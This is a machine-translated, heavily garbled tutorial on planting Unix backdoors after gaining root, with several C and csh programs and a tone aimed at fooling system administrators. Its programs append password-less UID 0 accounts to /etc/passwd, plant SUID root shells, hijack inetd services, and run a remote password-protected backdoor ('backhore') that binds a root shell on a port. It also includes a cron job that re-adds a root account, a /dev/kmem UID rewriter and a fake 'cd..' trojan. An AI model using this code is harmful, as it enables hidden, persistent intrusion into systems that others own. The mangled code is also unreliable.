Author: tiger primary articles The easiest way is to add a UID 0 account in the password file passwd. But don't do this, because as long as the system administrator checks the password file, it will "leak stuff". The following is a C program that adds a UID 0 account in the / etc / passwd password file. < > backdoor / backdoor1.c #include main () {file * fd; fd = fopen ("/ etc / passwd", "a "); fprintf (fd, "HAX0R :: 0: 0 :: / root : / bin / sh // n ");} <-> Slightly hidden in this method is to change the UID hidden in the password file to 0, and the second domain (The port field) is set to empty. (Note that if you are using a higher version * NIX, you may also modify the / etc / shadow file.) Place the Suid Shell in the / tmp directory. In the future, as long as you run this program, it will easily get root user privileges. This approach is almost the most popular. However, there are many systems every hour, or each launch will clear the data in the / tmp directory, and some other systems do not allow the SUID program under the / TMP directory. Of course, you can modify or clear these restrictions (because you are already root user, have permission modification / var / spool / cron / crontabs / root, and / etc / fstab file). The following is a C source program for placing the Suid Shell program in the / TMP directory. < > backdoor / backdoor2.c #include main () {system ("cp / bin / sh / tmp / fid"); system ("chown root.root / tmp / fid"); System ("CHMOD 4755 / TMP / FID ");} <-> ______________________________________________________________________________________________________________________________________________________ System administrators generally check the file frequently, so this is a good place to place "back door". :) So how do you build a best back door here? Of course it is a distance. This way you don't have to need a local account to become a root user. First, let's first understand the basics of this: inetd process is responsible for monitoring the connection requests of each TCP and UDP ports and launch the corresponding server process based on the connection request. This configuration file /etc/inetd.conf is very simple, basic forms are as follows: (1) (2) (3) (4) (5) (6) (7) FTP stream TCP NOWAIT ROOT / USR / ETC / FTPD FTPD Talk DGRAM UDP WAIT ROOT / USR / ETC / NTALKD NTALKD MOUNTD / 1 Stream RPC / TCP WAIT ROOT / USR / ETC / MOTD MOTD 1: The first column is the service name. The service name is mapped into port slogans by querying / etc / service files (for TCP and UDP services) or portmap daemon (for RPC services). RPC (Remote Procedure Call) service is identified by Name / Num's name format and RPC logo in the third column. 2: The second column determines the set of interfaces used by the service: stream, dgram or RAW.
Generally speaking, Stream is used for TCP services, and DGRAM is used for UDP, and RAW is rare. 3: The third column identifies the communication protocol used by the service. Allowed types are listed in the protocols file. The agreement is almost always TCP or UDP. The RPC service is crown in the protocol type with RPC /. 4: If the desired service can handle multiple requests (instead of exiting after processing), then the fourth column should be placed in Wait, which prevents inetd from continuously deriving the new copy of the daemon. This option is used to handle a large number of small requests. If WAIT is not suitable, then fill in the NOWAIT in this column. 5: The fifth column gives the username of the running daemon. 6: The sixth column gives a fully qualified path name of the daemon. 7: The real name of the daemon and its parameters. If the work you want is negligible (if you do not need user interaction), the inetd daemon will handle itself. The sixth and seven columns are only required to fill in / 'internal /'. So, to install a convenient back door, you can choose a service that is not used, with a daemon that can generate some back door instead of the original daemon. For example, let it add the UID 0 account, or copy a Suid Shell. One of a better way is to replace the service daytime for providing date time to generate a Suid Root. As long as the /ettime stream tcnf file is modified to: Daytime Stream TCP NOWAIT / BIN / SH SH-I. Then restart (Remember: Be sure to restart) inetd process: killall -9 inetd . But better, more hidden methods is to fake network services, allowing it to provide us with backmen, such as password protection, etc. If you can easily access your remote access without passing the Telnetd, it is better. The method is to bind the "own" daemon to a port, which does not provide any prompts to the outside connection, but as long as the correct password is directly entered, it will be able to enter the system smoothly. The following is a demonstration program of this back door. (Note: This program is not very complete.
) < > backdoor / remoteback.c / * Coders: Theft Help from: Sector9, Halogen Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle, halogen, Psionic, g0d, Psionic Groups:. Ethical Mutiny Crew (EMC ), Common Purpose Hackers (CPH), Global Hell (GH), Team Sploit, Hong Kong Danger duo, TG0D, EHAP. Usage: setup: # gcc -o backhore backhore.c # ./backdoor password & Run: telnet to the host on port 4000. After connected you Will not be prompted for a password, this way it is less Obvious, just type the password and press enter, after this you will be prompted for a command, pick 1-8 Distributers:. Ethical Mutiny Crew * / #include #include #include #include #include #include #include #include #define PORT 4000 #define MAXDATASIZE 100 #define BACKLOG 10 #define SA struct sockaddr void handle (int); int main (int argc, char * Argv []) {Int SockFD, New_FD, SIN_SIZE, NUMBYTES, CMD; CHAR ASK [10] = "Command:"; char * BYTES, * BUF, Pass [40]; struct sockaddr_in my_addr; struct sockaddr_in their_addr; Printf ("// n backhore beta by theft // n"); Printf ("1: Trojans rc.local /// N"); Printf ("2: sends a systemwide message /// n"); Printf ("3 : Binds a root shell on port 2000 // n "); Printf (" 4: Creates Suid SH IN / TMP /// N "); Printf (" 5: Creates Mutiny Account Uid 0 no Passwd // N "); Printf ("6: Drops to Suid Shell ///); Printf (" 7: Information on Backhore /// N "); Printf (" 8: Contact // N "); if (argc! = 2) {FPRINTF Stderr, "USAGE:% s Password /// N", Argv [0]); Exit (1);} STRNCPY (Pass, Argv [1], 40); Printf (".. using password:% s ../ / N ", pass); if ((sockfd = socket (AF_INET, SOCK_STREAM, 0) == -1) {PERROR (" socket "
); exit (1);} my_addr.sin_family = Af_inet; my_addr.sin_port = htons (port); my_addr.sin_addr.s_addr = INADDR_Addr = INADDR_Addr (Bind (SOCKFD, (SA *) & my_addr, sizeof (sa)) == -1) {PERROR ("bind"); exit (1);} == -1) {PERROR ("listen"); exit (1);} sin_size = sizeof (SA) WHILE (1) {/ * main accept () loop * / if ((new_fd = accept (sockfd, (sa *) & their_addr, & sin_size)) == -1) {PERROR ("accept"); Continue;} IF (! fork ()) {DUP2 (new_fd, 0); DUP2 (new_fd, 1); DUP2 (New_FD, 2); FGETS (BUF, 40, stdin); if (! strcmp (buf, pass) {printf "% s", ask); cmd = getchar (); handle (cmd);} close (new_fd); exit (0);} close (new_fd); while (waitpid (-1, null, wnohang)> 0) ; / * rape the dying children * /}} Void Handle (int CMD) {file * fd; case / '1 /':
Printf ("// nbackhore beta by theft // n");
Printf ("theft@cyberspace.org/n");
Printf ("Trojaning rc.local /// N");
FD = fopen ("/ etc / passwd", "a ");
FPRINTF (FD, "MUTINY :: 0: 0: Ethical Mutiny Crew: / root: / bin / sh");
Fclose (fd);
Printf ("Trojan Complete.//N");
Break;
Case / '2 /':
Printf ("// nbackhore beta by theft // n");
Printf ("theft@cyberspace.org/n");
Printf ("Sending SystemWide Message ..//");
System ("Wall Box Owned Via The Ethical Mutiny Crew");
Printf ("Message Sent./N");
Break;
Case / '3 /':
Printf ("// nbackhore beta by theft // n");
Printf ("theft@cyberspace.org/n");
Printf ("// Nadding inetd backdoor ... (-p) // n");
FD = FOPEN ("/ etc / services", "a ");
FPRINTF (FD, "Backdoor // T2000 / TCP // TBackDoor // n");
FD = fopen ("/ etc / inetd.conf", "a "); fprintf (fd, "backdoor // tstream // ttcp // Tnowait // n") ;
Execl ("KILLALL", "-hup", "inetd", null;
Printf ("// ndone.//n");
Printf ("Telnet to Port 2000 // n // n");
Break;
Case / '4 /':
Printf ("// nbackhore beta by theft // n");
Printf ("theft@cyberspace.org/n");
Printf ("// Nadding Suid Shell ... (-S) // n");
System ("cp / bin / sh/tmp/.sh");
System ("chmod 4700 /tmp/.sh");
System ("chown root: root /tmp/.sh");
Printf ("// nsuid shell added.//n");
Printf ("Execute /TMP/.sh/n/n//n");
Break;
Case / '5 /':
Printf ("// nbackhore beta by theft // n");
Printf ("theft@cyberspace.org/n");
Printf ("// Nadding root account ... (-u) // n");
FD = fopen ("/ etc / passwd", "a ");
FPRINTF (FD, "Hax0r :: 0: 0 :: /: / bin / bash // n");
Printf ("// ndone.//n");
Printf ("UID 0 and GID 0 Account Added // N // N");
Break;
Case / '6 /':
Printf ("// nbackhore beta by theft // n");
Printf ("theft@cyberspace.org/n");
Printf ("Executing Suid ..// N");
Execl ("/ bin / sh"); Break; Case / '7 /': Printf ("// nbackhore beta by theft /// n"); Printf ("theft@cyberspace.org/n"); Printf "// ninfo ... // n"); Printf ("// N3 - adds entries to / etc / services & /etc/inetd.conf giving you // n"); Printf ("a Root shell on port 2000. example: telnet 2000 // n // n "); Printf (" 4 - creates a copy of / bin / sh to /tmp/.sh which, whenever // n "); Printf (" Executed gives you a root shell. example: /tmp/.sh/n/n//N "); Printf (" 5 - adds an account with uid and gid 0 to the passwd file.//n "); Printf (" The login is / 'mutiny /' and there is no passwd. "); Break; Case / '8 /': Printf (" // nbackhore beta by theft // n "); printf (" // _ blank> http: ///t.Bored.org//N "); Printf (" theft@cyberspace.org/n/n/n "); Break; default: Printf (" Unknown Command:% D // N ", CMD); Break;}} <-> Advanced crontab programs are very useful for system administrators. The cron service is used to operate at a specific time (month, day, week, time, minute). If you are smart enough, you should use it to make it "back door"! With the cron service, you can make it at 2:00 am every day (this time the network management should sleep.) Run the latter program so that you can easily enter the system to do what you want to do, and exit the system before the network management. The root user's crontab file is placed in / var / spool / crontab / root, and its format is as follows:
(1) (2) (3) (4) (5) (6) 0 0 * * 3 / usr / bin / updatedb
1. Minute (0-60) 2. Hours (0-23) 3. Day (1-31) 4. Month (1-12) 5. Week (1-7) 6. The procedure to run
The above content is set to run at 0:0 per Word. To create a back door in Cron, just add a latter program in / var / spool / crontab / root. For example, the program can be checked daily in the / etc / passwd file to increase the user accounts still valid. The following is a program example:
0 0 * * * / usr / bin / retract
< > Backdoor / Backdoor.sh #! / bin / csh
Set evilflag = (**** grep eviLUser / etc / passwd ****)
IF ($ # Evilflag == 0) THEN
Set linecount = **** wc -l / etc / passwd **** CD cp / etc / passwd ./temppass @ linecount [1] / = 2 @ linecount [1] = 1 split - $ linecount [1] ./TemPass Echo "MEB :: 0: 0: Meb: / root: / bin / sh" >> ./xaa cat ./xab >> ./xaa mv ./xaa / etc / passwd chmod 644 / etc / passwd Rm ./xa* ./temppass echo done ... Else Endif <-> [General] Of course, we can write Trojans and put it in / bin directory. A Suid Shell will be generated when the parameter is run at a specific command line. The following is a program example:
< > Backdoor / Backdoor3.c #includ #define pass "triad" #define buffersize 6
Int main (argc, argv) int Argc; char * argv []; {
INT i = 0;
IF (argv [1]) {
IF (! ")) {
System ("cp / bin / csh /bin/.swp121"); System ("chmod 4755 /bin/.swp121"); System ("Chown root /bin/.swp121)); System (" CHMOD 4755 / BIN / .swp121 ");}}
Printf ("372f: invalid control argument, unable to initialize); for (; i <10; i ) {fprintf (stderr,"); Sleep (1);} printf ("// nAction aborted After 10 attempts.//n "); return (0);} <->
[variant]
The following procedure finds the UID you run in memory, and change it to 0, so you have a Suid root shell.
< > backdoor / kmemthief.c #include #include #include #include #include #include #include
#define pass "triad"
Struct User UserPage; Long Address (), UserLocation;
INT MAIN (Argc, Argv, Envp) int Argc; char * argv [], * envp []; {
Int count, fd; long where, lseek ();
IF (argv [1]) {IF (! (pASS, ARGV [1]))) {fd = (Open ("/ dev / kmem", o_rdwr);
IF (FD <0) {Printf ("Cannot Read or Write to / dev / kmem ///"); PERROR (Argv); exit (10);
UserLocation = address (); where = (Lseek (FD, UserLocation, 0);
IF (where! = UserLocation) {Printf ("Cannot Seek Useer Page /// N"; PERROR (Argv); Exit (20);} count = read (FD, & UserPage, SizeOf (Struct User);
IF (Count! = SIZEOF (Struct User) {Printf ("Cannot Read User Page // N); PERROR (Argv); EXIT (30);
Printf ("Current Uid:% D // N", UserPage.u_ruid; Printf ("Current GID:% D // N", UserPage.g_ruid;
Userpage.u_ruid = 0; userpage.u_rgid = 0;
Where = lseek (FD, UserLocation, 0);
IF (where! = UserLocation) {Printf ("Cannot Seek to User Page /// N"; PERROR (Argv); EXIT (40);
Write (FD, & Userpage, ((USERPAGE.U_PROCP)) - (CHAR *) & UserPage));
Execle ("/ bin / csh", "/ bin / csh", "- i", (char *) 0, ENVP);}}
}
["Stupid" method]
Have you tried to get "CD .." in the UNIX system is "CD .."? This is due to the habit of using MS Windows and MS-DOS. Does this error network tube do it? If this is this, can you let him do some "contributions"? , For example, when he enters "CD ..", we will activate our Trojan. This way we don't have to log in to the system to activate Trojans. The following is a program example:
< > backdoor / dumb.c / * This program can add a UID 0 account to the / etc / passwd file when the administrator is accidentally entered .. But at the same time, it also implements CD .. function, thus deceiving administrators. * /
#include #include
Main () {file * fd; fd = fopen ("/ etc / passwd", "a "); fprintf (fd, "Hax0r :: 0: 0 :: / root: / bin / sh // n"); System ("cd");} <->
